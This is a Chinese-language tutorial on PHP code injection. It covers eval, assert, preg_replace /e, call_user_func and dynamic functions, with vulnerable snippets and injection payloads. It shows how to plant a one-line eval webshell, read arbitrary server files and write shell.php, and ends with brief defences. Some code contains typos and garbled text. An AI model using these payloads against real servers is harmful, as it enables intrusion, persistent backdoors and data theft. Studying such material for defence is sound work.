本文探讨了代码执行(注入)的原因、条件,列举了如eval()、assert()等可能导致安全问题的相关函数,并介绍了直接获取shell的方法。同时,提出了防御代码注入的策略,包括避免使用特定函数和过滤输入。
代码执行(注入)
CE(代码执行)
RCE(远程代码执行)
原因
Web方面:是指应用程序过滤不严,用户可以通过请求将代码注入到应用程序中执行。代码执行(注入)是将代码注入到应用程序中,最终由服务器运行它。这样的漏洞如果没有特殊过滤,相当于有一个Web后门的存在。
条件
1.程序中含有可以执行PHP代码的函数或者语言结构
2.传入第一个点中的参数,客户端可控,直接修改或者影响
相关函数和语句
eval():会将字符串当做php代码执行
# 代码将字符串解析成php代码
[1]
<?php
$str = "phpinfo();";
eval($str);
?>
[2]
<?php
$str = "echo md5(123456)";
eval($str);
?>
[3]
<?php
if(isset($__REQUEST['code'])
{
@$str = $__REQUEST('code');
eval($str);
}
?>
# 几种方式
[?code=${phpinfo()};]
[?code=1;phpinfo();]
assert()
<?php
if(isset($__REQUEST['code'])
{
@$str = $__REQUEST('code');
assert($str);
}
?>
# 几种方式
?code=phpinfo();
?code=phpinfo()
preg_replace():对字符串进行正则处理
<?php
$str=preg_replace('/a/','b',"abcdefgajest");
echo $str;
?>
<?php
if(isset($__GET['code'])){
$code=$__GET['code'];
preg_replace("/\[(.*)\]/e",'\\1',$code);
}else{
echo "?code=[phpinfo()];"
}
?>
call _user_func():将第二个参数给第一个函数去执行
<?php
if(isset($__GET['fun'])){
$fun=$__GET['fun'];
$para=$__GET['para'];
cal_user_func($fun,$para);
}
?>
# 执行方式
?fun=assert¶=phpinfo();
动态函数 a ( a( a(b): a 为 函 数 名 字 , a为函数名字, a为函数名字,b为函数参数
<?php
if(isset($__GET['a'])){
$a=$__GET['a'];
$b=$__GET['b'];
$a=($b);
}else{
echo "?a=assert&b=phpinfo()";
}
?>
直接获取shell
提交参数[?code=@eval($__POST[1]);]即可回去一句哈木马,密码为1。可以使用菜刀连接。
# 获取当前文件的绝对路径
__FILE__:PHP预定义常量,其含义当前文件的路径。
[?code=print(__FILE__);]
# 读文件
file_get_contents():读取服务器任意文件,前提是知道目标文件的路径和读取权限。
[?code=var_dump(file_get_contents('c\windows\system32\drivers\etc\hosts'));] //读取服务器hosts文件。
# 写文件
file_put_contents():写入文件,前提是知道可写目录。
[?code=var_dump(file_put_contents($__POST[1],$__POST[2]));]
此时要借助hackbar通过post方式提交参数。
[1=shell,php&2=<?php phpinfo()?>]
即可在当前目录下创建一个shell.php
防御方法
1、尽量不要使用eval等函数
2、如果使用的话一定要严格过滤
3、preg_replace 放弃使用/e修饰符
4、在PHP.ini中禁用一些函数,disable_functions = assert ,然后重启服务器。eval只是一种语言结构。
扫一扫
6663
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
